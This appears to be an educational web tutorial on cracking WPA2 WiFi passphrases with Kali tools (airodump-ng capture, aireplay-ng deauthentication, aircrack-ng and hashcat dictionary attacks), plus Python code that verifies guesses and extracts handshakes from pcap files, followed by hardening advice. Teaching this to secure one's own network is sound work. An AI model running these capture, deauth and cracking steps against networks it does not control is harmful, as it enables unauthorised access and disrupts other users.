⚖️ CLASS RULE — READ THIS: Everything we do in this lesson is on your own network or a lab network you control. Testing on anyone else’s WiFi without written permission is a criminal offence — not a grey area, not a technicality. Criminal. I’m teaching you How to Hack Wifi Password so you understand how to defend networks, not attack strangers. We clear? Good. Let’s learn.

WiFi cracking is probably why most of you ended up on this site. That’s fine — it’s also genuinely one of the best ways to start understanding how cryptography, authentication, and network protocols work. So we’re going to do it properly.

Here’s my promise to you as your teacher: I’m not going to water this down. You’re going to understand exactly what’s happening at each step — not just type commands and hope they work. And when we’re done, you’re going to test your own network and find out whether your WiFi password would last five seconds or five hundred years against this attack.

What you’ll need:

  • Kali Linux (VM, live USB, or native install) — our installation guide
  • A wireless adapter that supports monitor mode (Alfa AWUS036ACH is the standard recommendation)
  • Your own WiFi network to test — or a lab network you control
  • About 30 minutes

How WPA2 Actually Works — And Why You MUST Understand This First

I know you want to jump straight to the terminal. I know. But I’m asking you to read this section first, because students who skip it always get stuck and don’t understand why their attack failed.

WPA2-Personal authenticates with a 4-way handshake. When your phone connects to your router, the two exchange four EAPOL-Key frames to prove that both hold the same Pairwise Master Key (PMK), which is derived from the passphrase and the SSID with PBKDF2-HMAC-SHA1 (4096 iterations). Here’s the key insight: the handshake never carries the passphrase or the PMK in plain text, but it does carry both MAC addresses, both random nonces, and a MIC computed with a key derived from the PMK. That is enough to verify whether a guess is correct: derive the PMK from the guess, derive the session key from it plus the captured values, recompute the MIC, and compare.

Think of it like a padlock. We don’t have the key, but we have the padlock. We can try keys one by one without needing to touch the lock mechanism — we just see if it opens. The handshake is the padlock. Our wordlist is the bag of keys.

This is called an offline dictionary attack. We capture the handshake once, take it away, and test password guesses against it with no further contact with the router. No lockouts. No rate limiting. The only brake is the PBKDF2 cost of each guess: a single modern GPU manages hundreds of thousands of guesses per second against WPA2, a CPU only thousands. That’s why your password quality is everything.
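The padlock in code, as an added example (not code from this page or from the aircrack-ng project): the key derivation and MIC check that every WPA2 cracker performs per guess, followed by the dictionary loop from Step 4 run against a constructed handshake. The BSSID and SSID are the demo network used throughout this lesson; the client MAC, the nonces, the EAPOL-Key frame contents and the wordlist are all constructed for the example, not taken from any real capture.

```python
import hashlib
import hmac
import struct
from typing import Iterable, Optional


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    Those 4096 iterations are the whole cost of a guess, which is why even a
    GPU manages kH/s against WPA2 rather than GH/s."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def derive_ptk(pmk: bytes, ap: bytes, sta: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """802.11 PRF-512: the PTK from the PMK plus the four values the handshake
    sends in the clear (both MAC addresses and both nonces)."""
    data = min(ap, sta) + max(ap, sta) + min(anonce, snonce) + max(anonce, snonce)
    out = b"".join(hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
                   for i in range(4))
    return out[:64]   # KCK = [0:16], KEK = [16:32], TK = [32:48]


def eapol_mic(kck: bytes, eapol_mic_zeroed: bytes, descriptor_version: int = 2) -> bytes:
    """Key MIC over the EAPOL-Key frame with its MIC field zeroed. Descriptor
    version 2 (WPA2/CCMP) is HMAC-SHA1 truncated to 16 bytes; version 1 (WPA/TKIP) is HMAC-MD5."""
    h = hashlib.sha1 if descriptor_version == 2 else hashlib.md5
    return hmac.new(kck, eapol_mic_zeroed, h).digest()[:16]


def eapol_key_frame(key_info: int, nonce: bytes, mic: bytes = bytes(16), replay: int = 1) -> bytes:
    """Minimal 99-byte EAPOL-Key frame (RSN descriptor, empty key data) in the
    802.11 layout: EAPOL header, descriptor type, key info, key length, replay
    counter, nonce, IV, RSC, key ID, MIC, key data length."""
    body = struct.pack(">BHHQ", 2, key_info, 16, replay) + nonce + bytes(32) + mic + b"\x00\x00"
    return struct.pack(">BBH", 1, 3, len(body)) + body


def check_guess(passphrase: str, hs: dict) -> bool:
    """Try one key in the padlock: rebuild the KCK from the guess and see
    whether it reproduces the MIC the client actually sent."""
    pmk = pmk_from_passphrase(passphrase, hs["ssid"])
    kck = derive_ptk(pmk, hs["ap"], hs["sta"], hs["anonce"], hs["snonce"])[:16]
    return hmac.compare_digest(eapol_mic(kck, hs["eapol"]), hs["mic"])


def dictionary_attack(wordlist: Iterable[str], hs: dict) -> Optional[str]:
    """Step 4 in miniature: the first candidate that verifies, or None."""
    for word in wordlist:
        word = word.rstrip("\r\n")
        if not 8 <= len(word) <= 63:   # WPA2 passphrase length limits; aircrack-ng skips these too
            continue
        if check_guess(word, hs):
            return word
    return None


def build_constructed_handshake(passphrase: str, ssid: str) -> dict:
    """What a capture hands the attacker, built here from the real passphrase.
    The client MAC and both nonces are arbitrary constructed values."""
    ap = bytes.fromhex("AABBCCDDEEFF")       # BSSID of the demo network from the scan
    sta = bytes.fromhex("020000000001")      # constructed client MAC
    anonce = bytes(range(32))                # constructed AP nonce (sent in message 1)
    snonce = bytes(range(32, 64))            # constructed client nonce (sent in message 2)
    m2 = eapol_key_frame(0x010A, snonce)     # message 2: pairwise + MIC bits, descriptor version 2
    kck = derive_ptk(pmk_from_passphrase(passphrase, ssid), ap, sta, anonce, snonce)[:16]
    return {"ssid": ssid, "ap": ap, "sta": sta, "anonce": anonce, "snonce": snonce,
            "eapol": m2, "mic": eapol_mic(kck, m2)}


HANDSHAKE = build_constructed_handshake("summer2019", "MyHomeNetwork")
WORDLIST = ["123456", "password123", "letmein", "Summer2019", "summer2019", "iloveyou"]  # constructed

if __name__ == "__main__":
    print("KEY FOUND!", dictionary_attack(WORDLIST, HANDSHAKE))
```

Notice that the router is never contacted inside the loop: everything the check needs came out of the capture, and the only thing standing between the attacker and the passphrase is the 4096-iteration PBKDF2 in pmk_from_passphrase. aircrack-ng and hashcat do exactly this, just much faster.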

Step 1: Enable Monitor Mode on Your Wireless Adapter

Your wireless card normally only pays attention to packets addressed to your device — like how you tune out conversations that aren’t directed at you. Monitor mode is the equivalent of listening to every conversation in the room simultaneously. We need it to capture the handshake between other devices and the router.

Important student note: not all wireless adapters support monitor mode. Built-in laptop WiFi cards usually don’t. The Alfa AWUS036ACH is the community standard recommendation for this; note that its Realtek RTL8812AU chipset needs the out-of-tree driver (the realtek-rtl88xxau-dkms package on Kali) before monitor mode works. Check yours first: iwconfig lists your wireless interfaces, and iw list shows “monitor” under “Supported interface modes” if the driver supports it.

terminal — Kali Linux
# Check your wireless interface name
iwconfig
# Kill processes that might interfere with monitor mode
sudo airmon-ng check kill
# Start monitor mode (replace wlan0 with your interface name)
sudo airmon-ng start wlan0
# Your interface is now wlan0mon (or similar) in monitor mode
PHY Interface Driver Chipset
phy0 wlan0mon ath9k_htc Atheros AR9271

Step 2: Scan the Area and Identify Your Network

Now we’re going to look at the WiFi landscape around us. This step teaches you something important: your WiFi adapter can see a lot more than your phone’s WiFi settings show you. The raw view from airodump-ng is much richer — BSSID (router MAC address), signal strength, channel, encryption type, and connected clients.

terminal — scan nearby networks
sudo airodump-ng wlan0mon
BSSID PWR Beacons #Data #/s CH MB ENC CIPHER AUTH ESSID
AA:BB:CC:DD:EE:FF -42 230 140 2 6 130 WPA2 CCMP PSK MyHomeNetwork
11:22:33:44:55:66 -78 89 12 0 11 54 WPA2 CCMP PSK Neighbour_WiFi
FF:EE:DD:CC:BB:AA -84 44 3 0 1 54 WPA3 CCMP SAE Office_Network
# Note your target’s BSSID and channel — you’ll need both
# Only proceed against your own network (MyHomeNetwork in this demo)

Step 3: Capture the Handshake

This is the critical step. We need to capture the moment a device authenticates with your router. You have two options: wait patiently for a device to naturally connect (could take a while), or send a deauthentication packet to force a connected device to reconnect. We’ll do both so you understand each approach.

Students often ask: “does the deauth hurt the device?” No. A deauthentication frame is an unauthenticated management frame that tells the client it has been disconnected; the device reconnects automatically within seconds, which is the equivalent of briefly turning WiFi off and on again. Two caveats. First, every client you deauth drops off the network for a moment, which is one more reason this stays on your own network. Second, clients that negotiate 802.11w Protected Management Frames (mandatory in WPA3, optional in WPA2) ignore forged deauths, so against those you have to wait for a natural reconnect.

terminal — capture handshake (replace values with your network’s)
# Focus on your target network and save the capture
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w handshake_capture wlan0mon
# In a second terminal — send deauth to force a reconnect
# (add -c <client MAC> to target one client instead of broadcasting to all of them)
sudo aireplay-ng --deauth 10 -a AA:BB:CC:DD:EE:FF wlan0mon
# Watch for this in airodump-ng output:
[ WPA handshake: AA:BB:CC:DD:EE:FF ]
# That’s it. Handshake captured. Stop the capture with Ctrl+C.
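What actually ends up in handshake_capture-01.cap, and how a cracker pulls the usable fields out of it, as an added example (not code from this page or from the aircrack-ng project): a minimal pcap and EAPOL-Key parser that pairs the router’s message 1 with the client’s message 2, the same check airodump-ng makes before it prints the WPA handshake banner. It runs over a constructed two-frame capture; the client MAC, nonces and MIC are arbitrary fixed values. airodump-ng writes raw 802.11 frames (pcap link type 105); the parser also skips a radiotap header if a file uses link type 127 instead.

```python
import struct
from typing import Iterator, Optional, Tuple

LINKTYPE_IEEE802_11 = 105           # raw 802.11 frames, what airodump-ng writes
LINKTYPE_IEEE802_11_RADIOTAP = 127  # radiotap-prefixed frames, what most other sniffers write
LLC_SNAP_EAPOL = bytes.fromhex("aaaa03000000888e")   # LLC/SNAP header for EtherType 0x888E (EAPOL)
KI_PAIRWISE, KI_INSTALL, KI_ACK, KI_MIC, KI_SECURE = 0x0008, 0x0040, 0x0080, 0x0100, 0x0200


def iter_pcap(blob: bytes) -> Iterator[Tuple[int, bytes]]:
    """Yield (linktype, frame) for every record of a classic (non-pcapng) pcap file."""
    magic = struct.unpack_from("<I", blob, 0)[0]
    end = "<" if magic in (0xA1B2C3D4, 0xA1B23C4D) else ">"
    linktype = struct.unpack_from(end + "I", blob, 20)[0]
    off = 24
    while off + 16 <= len(blob):
        incl_len = struct.unpack_from(end + "IIII", blob, off)[2]
        off += 16
        yield linktype, blob[off:off + incl_len]
        off += incl_len


def eapol_key_fields(frame: bytes, linktype: int) -> Optional[dict]:
    """Return the EAPOL-Key fields of an 802.11 data frame, or None for anything else."""
    if linktype == LINKTYPE_IEEE802_11_RADIOTAP:
        frame = frame[struct.unpack_from("<H", frame, 2)[0]:]   # radiotap length sits at offset 2
    if len(frame) < 24 or (frame[0] >> 2) & 0x3 != 2:           # frame type 2 = data
        return None
    hdr = 26 if frame[0] & 0x80 else 24                         # QoS data adds a 2-byte QoS control field
    to_ds, from_ds = frame[1] & 0x01, frame[1] & 0x02
    addr1, addr2 = frame[4:10], frame[10:16]
    if to_ds and not from_ds:        # client -> AP: addr1 = BSSID, addr2 = client
        ap, sta = addr1, addr2
    elif from_ds and not to_ds:      # AP -> client: addr1 = client, addr2 = BSSID
        ap, sta = addr2, addr1
    else:
        return None
    body = frame[hdr:]
    if not body.startswith(LLC_SNAP_EAPOL) or len(body) < 12 or body[9] != 3:  # EAPOL type 3 = Key
        return None
    eapol = body[8:8 + 4 + struct.unpack_from(">H", body, 10)[0]]   # cut any trailing FCS/padding
    if len(eapol) < 99:
        return None
    key_info = struct.unpack_from(">H", eapol, 5)[0]
    replay = struct.unpack_from(">Q", eapol, 9)[0]
    return {"ap": ap, "sta": sta, "key_info": key_info, "replay": replay,
            "nonce": eapol[17:49], "mic": eapol[81:97],
            "eapol": eapol[:81] + bytes(16) + eapol[97:]}   # MIC zeroed: the form the cracker hashes


def message_number(key_info: int) -> int:
    """1..4 from the key-info bits, the classification airodump-ng and hashcat apply; 0 if unknown."""
    ack, mic, install, secure = (bool(key_info & b) for b in (KI_ACK, KI_MIC, KI_INSTALL, KI_SECURE))
    if ack and not mic:
        return 1
    if ack and mic and install:
        return 3
    if mic and not ack:
        return 4 if secure else 2
    return 0


def extract_handshake(pcap_blob: bytes, bssid: bytes) -> Optional[dict]:
    """Pair the AP's ANonce (from M1, or from M3 whose replay counter is one higher)
    with a client M2 carrying the same replay counter. Returns the cracker's inputs or None."""
    anonces, m2s = {}, []   # (client MAC, replay counter) -> ANonce; candidate M2 frames
    for linktype, frame in iter_pcap(pcap_blob):
        k = eapol_key_fields(frame, linktype)
        if k is None or k["ap"] != bssid:
            continue
        n = message_number(k["key_info"])
        if n == 1:
            anonces[(k["sta"], k["replay"])] = k["nonce"]
        elif n == 3:
            anonces[(k["sta"], k["replay"] - 1)] = k["nonce"]
        elif n == 2:
            m2s.append(k)
    for k in m2s:
        if (k["sta"], k["replay"]) in anonces:
            return {"ap": bssid, "sta": k["sta"], "anonce": anonces[(k["sta"], k["replay"])],
                    "snonce": k["nonce"], "mic": k["mic"], "eapol": k["eapol"]}
    return None


def build_constructed_capture():
    """Two-frame pcap (link type 105): M1 from the AP, M2 from the client.
    Everything here is constructed for the example; client MAC, nonces and MIC are arbitrary."""
    ap, sta = bytes.fromhex("AABBCCDDEEFF"), bytes.fromhex("020000000001")
    anonce, snonce, mic = bytes(range(32)), bytes(range(32, 64)), bytes.fromhex("11" * 16)

    def eapol_key(key_info, nonce, mic, replay):   # RSN descriptor, no key data: 4 + 95 bytes
        body = struct.pack(">BHHQ", 2, key_info, 16, replay) + nonce + bytes(32) + mic + b"\x00\x00"
        return struct.pack(">BBH", 1, 3, len(body)) + body

    def data_frame(flags, a1, a2, a3, payload):      # plain (non-QoS) data frame, 24-byte header
        return bytes([0x08, flags]) + b"\x00\x00" + a1 + a2 + a3 + b"\x00\x00" + LLC_SNAP_EAPOL + payload

    m1 = data_frame(0x02, sta, ap, ap, eapol_key(0x008A, anonce, bytes(16), 1))  # FromDS; ACK, no MIC
    m2 = data_frame(0x01, ap, sta, ap, eapol_key(0x010A, snonce, mic, 1))        # ToDS; MIC, no ACK
    header = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, LINKTYPE_IEEE802_11)
    records = b"".join(struct.pack("<IIII", 0, 0, len(f), len(f)) + f for f in (m1, m2))
    return header + records, {"ap": ap, "sta": sta, "anonce": anonce, "snonce": snonce, "mic": mic}


if __name__ == "__main__":
    blob, truth = build_constructed_capture()
    hs = extract_handshake(blob, truth["ap"])
    print("[ WPA handshake: %s ]" % truth["ap"].hex(":").upper() if hs else "no complete handshake")
```

The replay-counter pairing is the detail worth remembering: if your capture has an ANonce from one association and an SNonce from another, the MIC will never verify and the crack fails with the right password in the wordlist, which is the usual reason a “captured” handshake turns out to be unusable.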

Step 4: Run the Dictionary Attack

Here’s where it gets satisfying. We’ve captured the handshake — now we run password guesses against it. Your first instinct might be to write a clever password guesser. Don’t. The rockyou.txt wordlist that comes with Kali already contains over 14 million real-world passwords from a previous breach. Real humans’ real passwords. If your target password is anything humans typically choose, it’s probably in there. Two practical notes: on Kali the file ships compressed, so run sudo gunzip /usr/share/wordlists/rockyou.txt.gz once before using it; and the list dates from a 2009 breach, so treat it as the starting point and pair it with mangling rules (hashcat’s -r rules/best64.rule, for example) to cover newer year suffixes and patterns.

terminal — dictionary attack against captured handshake
# Use rockyou.txt wordlist (pre-installed in Kali Linux)
sudo aircrack-ng handshake_capture-01.cap -w /usr/share/wordlists/rockyou.txt
Aircrack-ng 1.7
[00:00:03] 14344391 keys tested (4,901,823.70 k/s)
Current passphrase: password123
KEY FOUND! [ summer2019 ]
Master Key : 3F A2 B8 …
# The counter and rate above are illustrative. On a CPU aircrack-ng manages thousands
# of keys per second, so a full pass over rockyou takes on the order of an hour.
# A weak password that sits early in the list still falls within seconds.
# Season-plus-year passwords like summer2019 are exactly the pattern wordlists and rules are built to hit.

Step 5: Try hashcat for GPU-Accelerated Cracking

aircrack-ng uses your CPU. hashcat uses your GPU, which is orders of magnitude faster for this kind of work: a single consumer GPU reaches hundreds of thousands of guesses per second against WPA2, where a CPU core manages a few thousand. The converter hcxpcapngtool comes from the hcxtools package (sudo apt install hcxtools). hashcat records every cracked hash in its potfile, so a second run of the same command prints nothing new; use hashcat -m 22000 hash.hc22000 --show to reprint the result.

terminal — convert cap to hashcat format, then crack
# Convert the capture file to hashcat format (mode 22000)
hcxpcapngtool -o hash.hc22000 handshake_capture-01.cap
# Run hashcat with rockyou wordlist
hashcat -m 22000 hash.hc22000 /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting...
Speed.#1.........: 453.2 kH/s (GPU: RTX 3080)
# Cracked entries are printed as <hash line>:<passphrase>
<hash line>:summer2019
Session..........: hashcat
Status...........: Cracked


What This Means for Your Own WiFi — The Honest Lesson

Now comes the teachable moment. The most important thing I want you to take from this class isn’t the commands — it’s this table. Look at it carefully. Understand viscerally why password length and randomness matter. Because the difference between “cracked in 3 seconds” and “effectively uncrackable” is just a few extra random characters.

Password example      Time to crack (single GPU)   Verdict
password123           instant                      in wordlist
summer2019            3 seconds                    in wordlist
MyDog2018!            2-48 hours                   weak
Tr0ub4dor&3           weeks to months              moderate
k#9mP!vL2@qR7nX       centuries                    strong

(Rough figures for one consumer GPU running a wordlist plus mangling rules; the exact time depends on how early the pattern appears in the attacker’s rules. The last row is if anything an understatement: fifteen random printable characters is a keyspace no amount of GPU time exhausts.)

How to Actually Secure Your WiFi

  • Use WPA3 — if your router supports it, enable it. WPA3’s SAE handshake is a password-authenticated key exchange: each guess costs the attacker a live exchange with the router, so the capture-and-crack-offline attack shown above does not apply. Caveat: in WPA2/WPA3 “transition mode” the router still accepts WPA2 clients with the same passphrase, and their handshakes crack exactly as above, so switch to WPA3-only once all your devices support it
  • Generate a random password — 16+ characters, mixed case, numbers, symbols. Write it on a sticky note on your router if you have to. That’s fine. Random is what matters, not memorable. Give the network a non-default SSID as well: the SSID is the salt in WPA2’s key derivation, so a unique name makes precomputed tables for common router names useless
  • Disable WPS — WiFi Protected Setup has known vulnerabilities that bypass password strength entirely. Turn it off in your router settings
  • Check connected devices regularly — your router’s admin panel shows every connected device. Anything you don’t recognise should be investigated and blocked
  • Guest network for visitors — give guests their own isolated network with a separate password, keeping your main network private

Want to understand the full picture of network security? Our Network Security guide covers everything from packet analysis to MITM attacks. And if you want to go deeper on Kali Linux tools, check our Kali Linux Tools guide.

Frequently Asked Questions

Is it illegal to use aircrack-ng on someone else’s network?

Yes, absolutely. Accessing a WiFi network without authorisation violates the Computer Fraud and Abuse Act (USA), the Computer Misuse Act (UK), and equivalent laws in virtually every country. These are criminal offences, not civil ones. Only test on your own network or one you have explicit written permission to test.

Can WPA3 be cracked the same way?

No. WPA3 replaces the passphrase-derived PMK with one negotiated through Simultaneous Authentication of Equals (SAE), a password-authenticated key exchange. The 4-way handshake still runs afterwards, but its key no longer comes from the passphrase directly, so a captured handshake cannot be used to verify guesses offline. The attacker has to run a live SAE exchange with the access point for every guess, which the access point can rate-limit, making brute force dramatically slower and impractical. The exception is a network in WPA2/WPA3 transition mode, where WPA2 clients still perform the old handshake with the same passphrase.

Can my ISP tell if someone hacked my WiFi?

Your ISP can see unusual traffic patterns, but they don’t actively monitor for WiFi intrusion. You’d notice it more easily by checking your router’s connected devices list.

Can WiFi passwords be hacked using Kali Linux?

Yes, WiFi passwords can be tested using Kali Linux tools like aircrack-ng, but only in controlled environments. Ethical hackers use this method to identify weak passwords and improve network security. Unauthorized access to any network is illegal.

What is the easiest way to test WiFi security in Kali Linux?

The most common method is capturing a WPA/WPA2 handshake using tools like airodump-ng and then performing a dictionary-based password audit. This helps determine if your WiFi password is strong or vulnerable.

How can I protect my WiFi from hackers?

Use WPA3 encryption, create a strong password (16+ characters), disable WPS, update router firmware regularly, and avoid default credentials.
